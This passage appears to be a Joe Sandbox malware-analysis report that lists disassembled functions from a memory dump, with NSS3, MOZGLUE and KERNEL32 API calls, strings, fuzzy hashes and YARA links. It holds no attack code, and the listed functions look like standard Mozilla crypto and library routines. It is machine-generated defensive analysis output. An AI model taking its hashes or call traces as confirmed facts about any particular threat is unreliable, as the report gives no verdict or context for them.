Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?Yl
API String ID: 2446853827-2475275791
Opcode ID: edac35696ddf8eacd7e461d4e4fbc7f886c9f07c729b276e15a7d6ffc53cd3f3
Instruction ID: 3e8739d9144a53ef2b4ee98cde92d509121ca5cd7f7f2fe24a080ce36855478f
Opcode Fuzzy Hash: edac35696ddf8eacd7e461d4e4fbc7f886c9f07c729b276e15a7d6ffc53cd3f3
Instruction Fuzzy Hash: 6F51D2B6D00214EBDB009F25DC858AAB7B8EF5525CF048564EC1997B21EB31ED64C7E1

Function 6C5EAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5EADB1

Part of subcall function 6C5CBE30: SECOID_FindOID_Util.NSS3(6C58311B,00000000,?,6C58311B,?), ref: 6C5CBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5EADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5EAE08

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5EAE25
PL_FreeArenaPool.NSS3 ref: 6C5EAE63
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C5EAE4D

Part of subcall function 6C4F4C70: TlsGetValue.KERNEL32(?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4C97
Part of subcall function 6C4F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CB0
Part of subcall function 6C4F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5EAE93
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C5EAECC
PL_FreeArenaPool.NSS3 ref: 6C5EAEDE
PL_FinishArenaPool.NSS3 ref: 6C5EAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5EAEF5
PL_FinishArenaPool.NSS3 ref: 6C5EAF16

Strings

security, xrefs: 6C5EADEE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 62951f8be6f56ea5664e4597669b02e8b5d1a483cb732776483aaeb128140d21
Instruction ID: 9881d11be68372cc620e3b81a6a771f91a7c6447838c6c02d3223427f9262d42
Opcode Fuzzy Hash: 62951f8be6f56ea5664e4597669b02e8b5d1a483cb732776483aaeb128140d21
Instruction Fuzzy Hash: EC416DB1904310A7E7209B389C84BAB37B89F8A30CF150925E81493F41FB35AD09C7D7

Function 6C68AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C639890: TlsGetValue.KERNEL32(?,?,?,6C6397EB), ref: 6C63989E

EnterCriticalSection.KERNEL32(?), ref: 6C68AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C68AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C68AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C68AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C68B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C68B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C68B070
PR_JoinThread.NSS3(?), ref: 6C68B07B
free.MOZGLUE(?), ref: 6C68B084
EnterCriticalSection.KERNEL32(?), ref: 6C68B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C68B0C4
PR_JoinThread.NSS3(?), ref: 6C68B0F3
free.MOZGLUE(?), ref: 6C68B0FC
PR_JoinThread.NSS3(?), ref: 6C68B137
free.MOZGLUE(?), ref: 6C68B140

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: c71ccf5722391ef78160dac22b1bbd18e4198a5b70b6746c5f8354d9d253d695
Instruction ID: 66776bc7d2807f4bf3f7f5a69f25b9ed302b69901613b7d6f099f892c08f97ad
Opcode Fuzzy Hash: c71ccf5722391ef78160dac22b1bbd18e4198a5b70b6746c5f8354d9d253d695
Instruction Fuzzy Hash: 9F915CB5901611DFCB00DF15C88084ABBF1FF9A3187298569D8199BB22E732FD46CF99

Function 6C605CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C602BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C602A28,00000060,00000001), ref: 6C602BF0
Part of subcall function 6C602BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C602A28,00000060,00000001), ref: 6C602C07
Part of subcall function 6C602BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C602A28,00000060,00000001), ref: 6C602C1E
Part of subcall function 6C602BE0: free.MOZGLUE(?,00000000,00000000,?,6C602A28,00000060,00000001), ref: 6C602C4A

free.MOZGLUE(?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605D0F
free.MOZGLUE(?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605D4E
free.MOZGLUE(?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605D62
free.MOZGLUE(?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605D85
free.MOZGLUE(?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605D99
free.MOZGLUE(?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C605E3E
free.MOZGLUE(?,?,?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C605E47
free.MOZGLUE(?,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6080C1), ref: 6C605E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C60AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C605E78
free.MOZGLUE(?,?,?,?,?,?,?,6C60AAD4), ref: 6C605EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C60AAD4), ref: 6C605EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C60AAD4), ref: 6C605F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C60AAD4), ref: 6C605F4B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: c5ded8c8d5f7b31a2321fd00b92c365d85a1887f038fd6d86444228f29dde8d3
Instruction ID: b48f4538b14d87d94a7b273f30062f2d2c63f7450dc7c311a28ad13af815a59b
Opcode Fuzzy Hash: c5ded8c8d5f7b31a2321fd00b92c365d85a1887f038fd6d86444228f29dde8d3
Instruction Fuzzy Hash: 5571AFB4A00B009FD704CF24D988A92B7F5FF89308F148529E85E97B11E732F956CB99

Function 6C588DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C588E22
EnterCriticalSection.KERNEL32(?), ref: 6C588E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C588E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C588E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C588E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C588EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C588EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C588EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C588F00
free.MOZGLUE(?), ref: 6C588F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C588F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C588F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C588F5B
PR_Unlock.NSS3(?), ref: 6C588F72
PR_Unlock.NSS3(?), ref: 6C588F82

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 4a5ebd9dfcc94b69649acc50c151ed3a4de4a7eba14fd66dfce9e32e14a3298a
Instruction ID: 48b9c3ee74f03d3c7e62926342238bfb26f04c17e1057a41a69d6bd640b3c954
Opcode Fuzzy Hash: 4a5ebd9dfcc94b69649acc50c151ed3a4de4a7eba14fd66dfce9e32e14a3298a
Instruction Fuzzy Hash: 895109B2D02225AFDB10DF68CC8496AB7B9EF45358F154529EC089B700E731ED45C7E6

Function 6C680FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C681000

Part of subcall function 6C639BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C561A48), ref: 6C639BB3
Part of subcall function 6C639BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C561A48), ref: 6C639BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C681016

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_Unlock.NSS3(?), ref: 6C681021

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C681046
PR_Unlock.NSS3(?), ref: 6C68106B
PR_Lock.NSS3 ref: 6C681079
PR_Unlock.NSS3 ref: 6C681096
free.MOZGLUE(?), ref: 6C6810A7
free.MOZGLUE(?), ref: 6C6810B4
PR_DestroyCondVar.NSS3(?), ref: 6C6810BF
PR_DestroyCondVar.NSS3(?), ref: 6C6810CA
PR_DestroyCondVar.NSS3(?), ref: 6C6810D5
PR_DestroyCondVar.NSS3(?), ref: 6C6810E0
PR_DestroyLock.NSS3(?), ref: 6C6810EB
free.MOZGLUE(?), ref: 6C681105

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: a1b92f52ab1d77714bd32c964be15a5324fb984e6e2e7719208b2a585b7b172e
Instruction ID: 6e034f1f21325e4d3aebe579b6c77fd521568d9faf4a101fcd1322c7610e2fa1
Opcode Fuzzy Hash: a1b92f52ab1d77714bd32c964be15a5324fb984e6e2e7719208b2a585b7b172e
Instruction Fuzzy Hash: 2C31AAB5905401BBD7029F15EC81A45B771BF46359F184134E80A02F61EB72F978DBDA

Function 6C4FDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C4FDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C4FDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C4FDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C4FDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4FDECD

Strings

database corruption, xrefs: 6C4FDF77, 6C4FDFE7
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4FDF6D, 6C4FDFCC, 6C4FDFDD
%s at line %d of [%.10s], xrefs: 6C4FDF7C, 6C4FDFEC

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 056af5ddc775b581459fc6f62decb67385b6eea4150991350b9955c072279764
Instruction ID: 369316322974b31c9a32f7dec7fc1c3ec207fcf103da463b6333c93beaf7ec08
Opcode Fuzzy Hash: 056af5ddc775b581459fc6f62decb67385b6eea4150991350b9955c072279764
Instruction Fuzzy Hash: 81A1C2716046419BD710CF29C880E6AB7F5EFC5308F15892DF8A98BB51D731E847CBA6

Function 6C5BEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C5BEE0B

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BEEE1

Part of subcall function 6C5B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C5B1D7E
Part of subcall function 6C5B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C5B1D8E
Part of subcall function 6C5B1D50: PR_Unlock.NSS3(?), ref: 6C5B1DD3

TlsGetValue.KERNEL32 ref: 6C5BEE51
EnterCriticalSection.KERNEL32(?), ref: 6C5BEE65
PR_Unlock.NSS3(?), ref: 6C5BEEA2
free.MOZGLUE(?), ref: 6C5BEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C5BEED0
PR_Unlock.NSS3(?), ref: 6C5BEF48
free.MOZGLUE(?), ref: 6C5BEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C5BEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C5BEFA4
free.MOZGLUE(?), ref: 6C5BEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5BF055
free.MOZGLUE(?), ref: 6C5BF060

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 2077ccb6053f65b08dc51f670289c40372d2a57941f4b63b21e947b7d348dd47
Instruction ID: ead3a50fa6304f496e77b56f29d9e7279098d7b8f9ef42ff6687bd46b3be40c4
Opcode Fuzzy Hash: 2077ccb6053f65b08dc51f670289c40372d2a57941f4b63b21e947b7d348dd47
Instruction Fuzzy Hash: B4819175A00209ABDF00DFA5DC85ADE7BB5BF49308F084064F909B3B11E771E924CBA5

Function 6C584CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C584D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C584D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C584DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C584E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C584E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C584E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C584E85
DER_Encode_Util.NSS3(?,?,6C6D05A4,00000000), ref: 6C584EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C584F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C584F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C584F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C584F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C584F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C584FC8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: c4245b9fa8cb508cfa58452eb9e41b856b2e8ffdbce03ebbd78899551df1b931
Instruction ID: 7596e5a2cc4cba34ce2e84787dc46a11f5180364c34d072d720817d1cbd0f56b
Opcode Fuzzy Hash: c4245b9fa8cb508cfa58452eb9e41b856b2e8ffdbce03ebbd78899551df1b931
Instruction Fuzzy Hash: E9818D71A0A311AFE701CF29DC90B5AB7E8AB84318F15892DFD59DB740E731E9048B92

Function 6C5C5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C5C5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C5C5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C5C5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C5C5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C5C5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5C5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C5C5E18
TlsGetValue.KERNEL32 ref: 6C5C5E5E
EnterCriticalSection.KERNEL32(?), ref: 6C5C5E72
PR_Unlock.NSS3(?), ref: 6C5C5E8B

Part of subcall function 6C5BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5BF854
Part of subcall function 6C5BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5BF868
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5BF882
Part of subcall function 6C5BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5BF889
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5BF8A4
Part of subcall function 6C5BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5BF8AB
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5BF8C9
Part of subcall function 6C5BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5BF8D0

Strings

d, xrefs: 6C5C5C36
tokens=[0x%x=<%s>], xrefs: 6C5C5D3D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 70b9a21983a715e546dc76d16c7a3b1413d884be3e3fdc292bc57c8ad274ebd3
Instruction ID: f27b639c7650acecddd356b5a0a032223047a4cd0281bc69346dc9d37db35485
Opcode Fuzzy Hash: 70b9a21983a715e546dc76d16c7a3b1413d884be3e3fdc292bc57c8ad274ebd3
Instruction Fuzzy Hash: 6871D3B4B042019BEB009FE5DC85B6A3675AF9131CF940439E8099AB42EB32E915D693

Function 6C5B8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C5B9582), ref: 6C5B8F5B

Part of subcall function 6C5CBE30: SECOID_FindOID_Util.NSS3(6C58311B,00000000,?,6C58311B,?), ref: 6C5CBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B8F6A

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5B8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C5B8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C69D820,6C5B9576), ref: 6C5B8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C5B901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C5B903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5B90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C5B90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C5B90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C5B912D
free.MOZGLUE(00000000), ref: 6C5B9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5B9145

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
